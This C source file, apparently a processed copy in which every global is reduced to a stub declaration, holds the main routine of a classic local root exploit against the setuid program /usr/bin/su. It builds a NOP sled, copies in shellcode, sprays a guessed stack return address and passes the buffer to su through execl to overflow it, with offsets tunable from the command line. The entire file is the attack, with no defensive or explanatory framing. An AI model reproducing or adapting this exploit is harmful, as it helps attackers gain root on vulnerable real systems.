
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int NOPDEF ;
 int SIZE ;
 int * buffer ;
 int esp ;
 int execl (char*,char*,int *,int *) ;
 int get_esp () ;
 int memcpy (int *,int ,int) ;
 int memset (int *,int ,int) ;
 int nop ;
 int offset ;
 int printf (char*,...) ;
 int shell ;
 int strlen (int ) ;
 scalar_t__ strtol (char*,int *,int ) ;
 scalar_t__ strtoul (char*,int *,int ) ;
 int x86_nop ;

int main (int argc, char *argv[])
{
    register int i;

    if (argc > 1) offset += strtol(argv[1], ((void*)0), 0);
    if (argc > 2) nop += strtoul(argv[2], ((void*)0), 0);
    else
        nop = NOPDEF;
    esp = get_esp();

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    printf("offset = [0x%x]\n",esp+offset);
    execl("/usr/bin/su", "su", buffer, ((void*)0));

    printf("exec failed!\n");
    return 0;
}
